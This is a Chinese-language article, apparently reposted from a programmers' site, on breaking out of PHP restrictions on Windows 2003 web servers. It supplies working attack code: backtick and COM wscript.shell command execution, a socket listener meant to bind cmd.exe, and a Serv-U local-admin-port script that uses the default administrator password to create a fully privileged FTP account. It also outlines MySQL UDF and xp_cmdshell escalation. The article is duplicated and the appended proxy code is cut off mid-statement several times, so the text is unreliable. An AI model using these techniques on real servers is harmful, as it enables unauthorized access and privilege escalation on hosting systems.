win2003 PHP服务器的突破新思路
程序员文章站
2023-02-26 20:29:55
在win2000中, 一个普通的php shell便能把它打垮; 在win xp, 即使safe mode = off,你也无法用system() 等函数执行系统命令, 但...
在win2000中, 一个普通的php shell便能把它打垮; 在win xp, 即使safe mode = off,你也无法用system() 等函数执行系统命令, 但是我们还能用com()函数进行突破;到win 2003,即使iis 和php都是默认安装,你用system(), com()也可能拿它没辙。这时候你就不得不使用一些新的方法来进行突破了。
1、disable_functions的突破
在php -4.0.1以上的版本,php.ini里引入了一项功能disable_functions , 这个功能比较有用,可以用它禁止一些函数。比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候将会提示warning: system() has been disabled for security reasons,同时程序终止运行。但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性,比如还可以用(`)来执行命令,示例代码如下:
<?$output = `ls -al`;echo "<pre>$output</pre>";?>
据说这个只有设成safe_mode为on才能避免,但上次我在一台国外的服务器上使用的时候还是失败了,人并不是什么时候都能那么走运的:)
2、dl()函数的应用
当任何php的内部命令执行数和''都无法使用的时候,可以尝试dl(),该方法只能用于safe mode=off, 因为它在安全模式下是被禁用的。利用dl()你可以直接调用w32api 函数,可惜这个扩展已被移动到 pecl 库中,且自php 5.1.0以下版本起不再被绑定。以下是手册里的例子:
// 加载此扩展
dl("php_w32api.dll");
// 注册 gettickcount 函数,来自 kernel32.dll
w32api_register_function("kernel32.dll",
"gettickcount",
"long");
// 注册 messageboxa 函数,来自 user32.dll
w32api_register_function("user32.dll",
"messageboxa",
"long");
// 取得开机时间信息
$ticks = gettickcount();
// 转换为易于理解的文本
$secs = floor($ticks / 1000);
$mins = floor($secs / 60);
$hours = floor($mins / 60);
$str = sprintf("you have been using your computer for:".
"\r\n %d milliseconds, or \r\n %d seconds".
"or \r\n %d mins or\r\n %d hours %d mins.",
$ticks,
$secs,
$mins,
$hours,
$mins - ($hours*60));
// 显示一个消息对话框,只有一个 ok 按钮和上面的开机时间文本
messageboxa(null,
$str,
"uptime information",
mb_ok);
?>
可惜我还没有理解透彻dl()和w32api, 所以就不乱举例子了, 免得误导读者。
3、com 和 .net(windows)函数的应用
com(component object model,组件对象模型)是微软开发的软件规范,它用于开发面向对象的、编译好的软件组件,它允许把软件抽象成为二进制的部件,主要运用于windows平台。
php 的 windows 版本已经内置该扩展模块的支持。无需加载任何附加扩展库即可使用com函数。它的使用方法类似于c++或java中类的创建的语法,并把com的类名作为参数传递到构造函数。例如使用在php中调用“wscript.shell”执行系统命令:
$cmd=” e:/cert/admin/psexec.exe”;
if($com=new com("wscript.shell")) echo "yes";
if(!$cmd1=$com->exec($cmd))
{
echo "can not exec()";
}
if(!$cmd2=$cmd1->stdout())
{
echo "can not stdout()";
}
if(!$cmd3=$cmd2->readall())
{
echo "can not readall()";
}
echo $cmd3;
?>
图1是我写的一个执行psexec.exe的一个例子。
这段代码与asp的的意思是一模一样的,当然,你也可以像asp那样调用“adodb.connection”,利用这个组件结合jet2溢出漏洞,可能能够在php saft mode=on下拿到一个shell。
//create the database connection
$conn = new com("adodb.connection");
$dsn = "driver={microsoft access driver (*.mdb)}; dbq=" . realpath("mydb.mdb");
$conn->open($dsn);
//pull the data through sql string
$rs = $conn->execute("select clients from web");
…..
?>
.net 函数只能运行在 php 5上,当然,它需要 “.net runtime”的支持,而且这的php的一个实验性模块,功能还未齐全,所以在这就不讨论了。
4、java()函数的应用
该方法适用于safe mode=on。要使用java模块服务器必须事先安装java虚拟机,而且在php安装配置的时候打开了with-java的选项,代码如下:
[java]
;这是到php_java.jar的路径
;java.class.path = .\php_java.jar
;jdk的路径
;java.home = f:\jdk1.3.0
;到虚拟机的路径
;java.library=f:\jdk1.3.0\jre\bin\hostspot\jvm.dll
同com一样,使用java创建类(不仅仅是javabeans)只需把java的类名作为参数传递到构造函数。以下是手册里边的一个例子:
// this example is only intended to be run as a cgi.
$frame = new java('java.awt.frame', 'php');
$button = new java('java.awt.button', 'hello java world!');
$frame->add('north', $button);
$frame->validate();
$frame->pack();
$frame->visible = true;
$thread = new java('java.lang.thread');
$thread->sleep(10000);
$frame->dispose();
?>
可惜能真正支持java的php服务器并不多见,所以在这也不多讨论了。
5、socket()函数的应用
socket 是php中功能极为强大的一个模块,如果你使用高级的、抽象的接口(由fsockopen()和psockopen函数打开的socket),是不需要打开“php_sockets.dll”的。但是如果要使用完整的socket函数块,就必须在php.ini这样设置:
;windows extensions
;note that mysql and odbc support is now built in, so no dll is needed for it.
……..
;去掉以下一句最前边的分号
;extension=php_sockets.dll
使用php的socket函数块可以实现端口转发/重定向、数据包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且, 还可以用它构造tcp/udp服务器, 同时, 我觉得它也是突破服务器安全策略的一个最好的办法。以下便是一个在服务器上打开端口构造tcp服务器的例子,你可以用它来捆绑上服务器的cmd.exe:
//在服务器上构造tcp服务
//该例子需要php_sockets.dll的支持
//执行后便可使用” telnet 127.0.0.1 1020”连接
error_reporting(e_all);
/* allow the script to hang around waiting for connections. */
set_time_limit(0);
/* turn on implicit output flushing so we see what we're getting
* as it comes in. */
ob_implicit_flush();
//在服务器上绑定ip和端口
$address = '127.0.0.1';
$port = 1020;
if (($sock = socket_create(af_inet, sock_stream, sol_tcp)) < 0) {
echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
}
if (($ret = socket_bind($sock, $address, $port)) < 0) {
echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
}
if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
}
do {
if (($msgsock = socket_accept($sock)) < 0) {
echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";
break;
}
/* send instructions. */
$msg = "\nwelcome to the php test server. \n" .
"to quit, type 'quit'. to shut down the server type 'shutdown'.\n";
socket_write($msgsock, $msg, strlen($msg));
do {
if (false === socket_recv($msgsock, $buf , 1024, 0)) {
echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n";
break 2;
}
if (!$buf = trim($buf)) {
continue;
}
if ($buf == 'quit') {
break;
}
if ($buf == 'shutdown') {
socket_close($msgsock);
break 2;
}
$talkback = "php: you said '$buf'.\n";
socket_write($msgsock, $talkback, strlen($talkback));
echo "$buf\n";
//以下处理接受到的buf
/*eg:例如
$buf=”cmd.exe /c netstat –an”;
$pp = popen('$buf ', 'r');
while($read = fgets($pp, 2096))
echo $read;
pclose($pp);
*/
} while (true);
socket_close($msgsock);
} while (true);
socket_close($sock);
?>
事实上,很多主机都是没有加载php_sockets.dll的,庆幸的是,不需要socket模块支持的“fsockopen”函数已经足够我们使用了。因为只要有“fsockopen”,我们便可以*地读写本机中未对外部开放的端口。使用fsockopen读写serv-u 的本地管理端口43958 (注: 该端口无法在外部连结) 进行提权便是一个很典型的例子:
$adminuser=” localadministrator”;
$adminpass=” #l@$ak#.lk;0@p”;
$adminport=” 43958”;
$fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);
if (!$fp) {
echo "$errstr ($errno)
\n";
} else {
//可以写入$shellcode
// fputs ($fp, $shellcode);
fputs ($fp, "user ".$adminuser."\r\n");
sleep (1);
fputs ($fp, "pass ".$adminpass."\r\n");
sleep (1);
fputs ($fp, "site maintenance\r\n");
sleep (1);
fputs ($fp, "-setusersetup\r\n");
fputs ($fp, "-ip=".$addr."\r\n");
fputs ($fp, "-portno=".$ftpport."\r\n");
fputs ($fp, "-user=".$user."\r\n");
fputs ($fp, "-password=".$password."\r\n");
fputs ($fp, "-homedir=".$homedir."\r\n");
fputs ($fp, "-loginmesfile=\r\n");
fputs ($fp, "-disable=0\r\n");
fputs ($fp, "-relpaths=0\r\n");
fputs ($fp, "-needsecure=0\r\n");
fputs ($fp, "-hidehidden=0\r\n");
fputs ($fp, "-alwaysallowlogin=0\r\n");
fputs ($fp, "-changepassword=1\r\n");
fputs ($fp, "-quotaenable=0\r\n");
fputs ($fp, "-maxusersloginperip=-1\r\n");
fputs ($fp, "-speedlimitup=-1\r\n");
fputs ($fp, "-speedlimitdown=-1\r\n");
fputs ($fp, "-maxnrusers=-1\r\n");
fputs ($fp, "-idletimeout=600\r\n");
fputs ($fp, "-sessiontimeout=-1\r\n");
fputs ($fp, "-expire=0\r\n");
fputs ($fp, "-ratioup=1\r\n");
fputs ($fp, "-ratiodown=1\r\n");
fputs ($fp, "-ratioscredit=0\r\n");
fputs ($fp, "-quotacurrent=0\r\n");
fputs ($fp, "-quotamaximum=0\r\n");
fputs ($fp, "-maintenance=system\r\n");
fputs ($fp, "-passwordtype=regular\r\n");
fputs ($fp, "-ratios=none\r\n");
fputs ($fp, " access=".$homedir."|rwamelcdp\r\n");
fputs ($fp, "quit\r\n");
sleep (1);
while (!feof($fp)) {
echo fgets ($fp,128);
}
}
?>
还可以利用fsockopen编写http代理,从而访问外网或本机中无法外部访问的网站。我手上有一个完整的httpproxy(图4),代码较长。有兴趣的读者可以看看。
6、mysql/mssql接口
不同于linux的是,windows下的mysql/mssql一般是以系统管理员身份运行的,因此,只要能拿到本机sql数据库中的root/sa密码,你就可以直接用php连接数据库来执行系统命令。
在mysql中执行系统命令要利用用户自定义函数“mysql udf dynamic library”这个漏洞。在mssql中只要连接上数据库,就能直接调用“master..xp_cmdshell“扩展执行命令,权限当然是system权限。
总结一下:由于系统、iis、php的版本不一样,以上提到的几个突破方法可能会有所变化,php还有许多扩展功能是可以利用的,走出system()那几个系统命令执行函数,你就有可能突破系统安全策略的限制!
后面附上proxy.php的代码
error_reporting(e_all);
/*
// this program is free software; you can redistribute it and/or
// modify it under the terms of the gnu general public license
// as published by the free software foundation; either version 2
// of the license, or (at your option) any later version.
//
// this program is distributed in the hope that it will be useful,
// but without any warranty; without even the implied warranty of
// merchantability or fitness for a particular purpose. see the
// gnu general public license for more details.
//
// you should have received a copy of the gnu general public license
// along with this program; if not, write to the free software
// foundation, inc., 59 temple place - suite 330, boston, ma 02111-1307, usa.
//-------------------------------------------------------------------
// class: phproxy
// author: ultimategamer00 (abdullah a.)
// last modified: 6:28 pm 6/22/2004
*/
function __stripslashes($str)
{
return get_magic_quotes_gpc() ? stripslashes($str) : $str;
}
if (!function_exists('str_rot13'))
{
function str_rot13($str)
{
static $alpha = array('abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz',
'nopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklm');
return strtr($str, $alpha[0], $alpha[1]);
}
}
class phproxy
{
var $allowed_hosts = array();
var $version;
var $script_url;
var $url;
var $url_segments;
var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);
var $socket;
var $content_type;
var $request_headers;
var $post_body;
var $response_headers;
var $response_body;
function phproxy($flags = 'previous')
{
$this->version = '0.2';
$this->script_url = 'http'
. (isset(
function set_request_headers()
{
$headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " http/1.0\r\n";
$headers .= "host: :\r\n";
$headers .= "user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)\r\n";
$headers .= "accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";
$headers .= "connection: close\r\n";
if ($this->flags['show_referer'] == 1)
{
$headers .= "referer: \r\n";
}
$cookies = $this->get_cookies();
$headers .= $cookies != '' ? "cookie: $cookies\r\n" : '';
if (
function set_request_headers()
{
$headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " http/1.0\r\n";
$headers .= "host: :\r\n";
$headers .= "user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)\r\n";
$headers .= "accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";
$headers .= "connection: close\r\n";
if ($this->flags['show_referer'] == 1)
{
$headers .= "referer: \r\n";
}
$cookies = $this->get_cookies();
$headers .= $cookies != '' ? "cookie: $cookies\r\n" : '';
1、disable_functions的突破
在php -4.0.1以上的版本,php.ini里引入了一项功能disable_functions , 这个功能比较有用,可以用它禁止一些函数。比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候将会提示warning: system() has been disabled for security reasons,同时程序终止运行。但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性,比如还可以用(`)来执行命令,示例代码如下:
<?$output = `ls -al`;echo "<pre>$output</pre>";?>
据说这个只有设成safe_mode为on才能避免,但上次我在一台国外的服务器上使用的时候还是失败了,人并不是什么时候都能那么走运的:)
2、dl()函数的应用
当任何php的内部命令执行数和''都无法使用的时候,可以尝试dl(),该方法只能用于safe mode=off, 因为它在安全模式下是被禁用的。利用dl()你可以直接调用w32api 函数,可惜这个扩展已被移动到 pecl 库中,且自php 5.1.0以下版本起不再被绑定。以下是手册里的例子:
// 加载此扩展
dl("php_w32api.dll");
// 注册 gettickcount 函数,来自 kernel32.dll
w32api_register_function("kernel32.dll",
"gettickcount",
"long");
// 注册 messageboxa 函数,来自 user32.dll
w32api_register_function("user32.dll",
"messageboxa",
"long");
// 取得开机时间信息
$ticks = gettickcount();
// 转换为易于理解的文本
$secs = floor($ticks / 1000);
$mins = floor($secs / 60);
$hours = floor($mins / 60);
$str = sprintf("you have been using your computer for:".
"\r\n %d milliseconds, or \r\n %d seconds".
"or \r\n %d mins or\r\n %d hours %d mins.",
$ticks,
$secs,
$mins,
$hours,
$mins - ($hours*60));
// 显示一个消息对话框,只有一个 ok 按钮和上面的开机时间文本
messageboxa(null,
$str,
"uptime information",
mb_ok);
?>
可惜我还没有理解透彻dl()和w32api, 所以就不乱举例子了, 免得误导读者。
3、com 和 .net(windows)函数的应用
com(component object model,组件对象模型)是微软开发的软件规范,它用于开发面向对象的、编译好的软件组件,它允许把软件抽象成为二进制的部件,主要运用于windows平台。
php 的 windows 版本已经内置该扩展模块的支持。无需加载任何附加扩展库即可使用com函数。它的使用方法类似于c++或java中类的创建的语法,并把com的类名作为参数传递到构造函数。例如使用在php中调用“wscript.shell”执行系统命令:
$cmd=” e:/cert/admin/psexec.exe”;
if($com=new com("wscript.shell")) echo "yes";
if(!$cmd1=$com->exec($cmd))
{
echo "can not exec()";
}
if(!$cmd2=$cmd1->stdout())
{
echo "can not stdout()";
}
if(!$cmd3=$cmd2->readall())
{
echo "can not readall()";
}
echo $cmd3;
?>
图1是我写的一个执行psexec.exe的一个例子。
这段代码与asp的的意思是一模一样的,当然,你也可以像asp那样调用“adodb.connection”,利用这个组件结合jet2溢出漏洞,可能能够在php saft mode=on下拿到一个shell。
//create the database connection
$conn = new com("adodb.connection");
$dsn = "driver={microsoft access driver (*.mdb)}; dbq=" . realpath("mydb.mdb");
$conn->open($dsn);
//pull the data through sql string
$rs = $conn->execute("select clients from web");
…..
?>
.net 函数只能运行在 php 5上,当然,它需要 “.net runtime”的支持,而且这的php的一个实验性模块,功能还未齐全,所以在这就不讨论了。
4、java()函数的应用
该方法适用于safe mode=on。要使用java模块服务器必须事先安装java虚拟机,而且在php安装配置的时候打开了with-java的选项,代码如下:
[java]
;这是到php_java.jar的路径
;java.class.path = .\php_java.jar
;jdk的路径
;java.home = f:\jdk1.3.0
;到虚拟机的路径
;java.library=f:\jdk1.3.0\jre\bin\hostspot\jvm.dll
同com一样,使用java创建类(不仅仅是javabeans)只需把java的类名作为参数传递到构造函数。以下是手册里边的一个例子:
// this example is only intended to be run as a cgi.
$frame = new java('java.awt.frame', 'php');
$button = new java('java.awt.button', 'hello java world!');
$frame->add('north', $button);
$frame->validate();
$frame->pack();
$frame->visible = true;
$thread = new java('java.lang.thread');
$thread->sleep(10000);
$frame->dispose();
?>
可惜能真正支持java的php服务器并不多见,所以在这也不多讨论了。
5、socket()函数的应用
socket 是php中功能极为强大的一个模块,如果你使用高级的、抽象的接口(由fsockopen()和psockopen函数打开的socket),是不需要打开“php_sockets.dll”的。但是如果要使用完整的socket函数块,就必须在php.ini这样设置:
;windows extensions
;note that mysql and odbc support is now built in, so no dll is needed for it.
……..
;去掉以下一句最前边的分号
;extension=php_sockets.dll
使用php的socket函数块可以实现端口转发/重定向、数据包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且, 还可以用它构造tcp/udp服务器, 同时, 我觉得它也是突破服务器安全策略的一个最好的办法。以下便是一个在服务器上打开端口构造tcp服务器的例子,你可以用它来捆绑上服务器的cmd.exe:
//在服务器上构造tcp服务
//该例子需要php_sockets.dll的支持
//执行后便可使用” telnet 127.0.0.1 1020”连接
error_reporting(e_all);
/* allow the script to hang around waiting for connections. */
set_time_limit(0);
/* turn on implicit output flushing so we see what we're getting
* as it comes in. */
ob_implicit_flush();
//在服务器上绑定ip和端口
$address = '127.0.0.1';
$port = 1020;
if (($sock = socket_create(af_inet, sock_stream, sol_tcp)) < 0) {
echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
}
if (($ret = socket_bind($sock, $address, $port)) < 0) {
echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
}
if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
}
do {
if (($msgsock = socket_accept($sock)) < 0) {
echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";
break;
}
/* send instructions. */
$msg = "\nwelcome to the php test server. \n" .
"to quit, type 'quit'. to shut down the server type 'shutdown'.\n";
socket_write($msgsock, $msg, strlen($msg));
do {
if (false === socket_recv($msgsock, $buf , 1024, 0)) {
echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n";
break 2;
}
if (!$buf = trim($buf)) {
continue;
}
if ($buf == 'quit') {
break;
}
if ($buf == 'shutdown') {
socket_close($msgsock);
break 2;
}
$talkback = "php: you said '$buf'.\n";
socket_write($msgsock, $talkback, strlen($talkback));
echo "$buf\n";
//以下处理接受到的buf
/*eg:例如
$buf=”cmd.exe /c netstat –an”;
$pp = popen('$buf ', 'r');
while($read = fgets($pp, 2096))
echo $read;
pclose($pp);
*/
} while (true);
socket_close($msgsock);
} while (true);
socket_close($sock);
?>
事实上,很多主机都是没有加载php_sockets.dll的,庆幸的是,不需要socket模块支持的“fsockopen”函数已经足够我们使用了。因为只要有“fsockopen”,我们便可以*地读写本机中未对外部开放的端口。使用fsockopen读写serv-u 的本地管理端口43958 (注: 该端口无法在外部连结) 进行提权便是一个很典型的例子:
$adminuser=” localadministrator”;
$adminpass=” #l@$ak#.lk;0@p”;
$adminport=” 43958”;
$fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);
if (!$fp) {
echo "$errstr ($errno)
\n";
} else {
//可以写入$shellcode
// fputs ($fp, $shellcode);
fputs ($fp, "user ".$adminuser."\r\n");
sleep (1);
fputs ($fp, "pass ".$adminpass."\r\n");
sleep (1);
fputs ($fp, "site maintenance\r\n");
sleep (1);
fputs ($fp, "-setusersetup\r\n");
fputs ($fp, "-ip=".$addr."\r\n");
fputs ($fp, "-portno=".$ftpport."\r\n");
fputs ($fp, "-user=".$user."\r\n");
fputs ($fp, "-password=".$password."\r\n");
fputs ($fp, "-homedir=".$homedir."\r\n");
fputs ($fp, "-loginmesfile=\r\n");
fputs ($fp, "-disable=0\r\n");
fputs ($fp, "-relpaths=0\r\n");
fputs ($fp, "-needsecure=0\r\n");
fputs ($fp, "-hidehidden=0\r\n");
fputs ($fp, "-alwaysallowlogin=0\r\n");
fputs ($fp, "-changepassword=1\r\n");
fputs ($fp, "-quotaenable=0\r\n");
fputs ($fp, "-maxusersloginperip=-1\r\n");
fputs ($fp, "-speedlimitup=-1\r\n");
fputs ($fp, "-speedlimitdown=-1\r\n");
fputs ($fp, "-maxnrusers=-1\r\n");
fputs ($fp, "-idletimeout=600\r\n");
fputs ($fp, "-sessiontimeout=-1\r\n");
fputs ($fp, "-expire=0\r\n");
fputs ($fp, "-ratioup=1\r\n");
fputs ($fp, "-ratiodown=1\r\n");
fputs ($fp, "-ratioscredit=0\r\n");
fputs ($fp, "-quotacurrent=0\r\n");
fputs ($fp, "-quotamaximum=0\r\n");
fputs ($fp, "-maintenance=system\r\n");
fputs ($fp, "-passwordtype=regular\r\n");
fputs ($fp, "-ratios=none\r\n");
fputs ($fp, " access=".$homedir."|rwamelcdp\r\n");
fputs ($fp, "quit\r\n");
sleep (1);
while (!feof($fp)) {
echo fgets ($fp,128);
}
}
?>
还可以利用fsockopen编写http代理,从而访问外网或本机中无法外部访问的网站。我手上有一个完整的httpproxy(图4),代码较长。有兴趣的读者可以看看。
6、mysql/mssql接口
不同于linux的是,windows下的mysql/mssql一般是以系统管理员身份运行的,因此,只要能拿到本机sql数据库中的root/sa密码,你就可以直接用php连接数据库来执行系统命令。
在mysql中执行系统命令要利用用户自定义函数“mysql udf dynamic library”这个漏洞。在mssql中只要连接上数据库,就能直接调用“master..xp_cmdshell“扩展执行命令,权限当然是system权限。
总结一下:由于系统、iis、php的版本不一样,以上提到的几个突破方法可能会有所变化,php还有许多扩展功能是可以利用的,走出system()那几个系统命令执行函数,你就有可能突破系统安全策略的限制!
后面附上proxy.php的代码
error_reporting(e_all);
/*
// this program is free software; you can redistribute it and/or
// modify it under the terms of the gnu general public license
// as published by the free software foundation; either version 2
// of the license, or (at your option) any later version.
//
// this program is distributed in the hope that it will be useful,
// but without any warranty; without even the implied warranty of
// merchantability or fitness for a particular purpose. see the
// gnu general public license for more details.
//
// you should have received a copy of the gnu general public license
// along with this program; if not, write to the free software
// foundation, inc., 59 temple place - suite 330, boston, ma 02111-1307, usa.
//-------------------------------------------------------------------
// class: phproxy
// author: ultimategamer00 (abdullah a.)
// last modified: 6:28 pm 6/22/2004
*/
function __stripslashes($str)
{
return get_magic_quotes_gpc() ? stripslashes($str) : $str;
}
if (!function_exists('str_rot13'))
{
function str_rot13($str)
{
static $alpha = array('abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz',
'nopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklm');
return strtr($str, $alpha[0], $alpha[1]);
}
}
class phproxy
{
var $allowed_hosts = array();
var $version;
var $script_url;
var $url;
var $url_segments;
var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);
var $socket;
var $content_type;
var $request_headers;
var $post_body;
var $response_headers;
var $response_body;
function phproxy($flags = 'previous')
{
$this->version = '0.2';
$this->script_url = 'http'
. (isset(
function set_request_headers()
{
$headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " http/1.0\r\n";
$headers .= "host: :\r\n";
$headers .= "user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)\r\n";
$headers .= "accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";
$headers .= "connection: close\r\n";
if ($this->flags['show_referer'] == 1)
{
$headers .= "referer: \r\n";
}
$cookies = $this->get_cookies();
$headers .= $cookies != '' ? "cookie: $cookies\r\n" : '';
if (
function set_request_headers()
{
$headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " http/1.0\r\n";
$headers .= "host: :\r\n";
$headers .= "user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)\r\n";
$headers .= "accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";
$headers .= "connection: close\r\n";
if ($this->flags['show_referer'] == 1)
{
$headers .= "referer: \r\n";
}
$cookies = $this->get_cookies();
$headers .= $cookies != '' ? "cookie: $cookies\r\n" : '';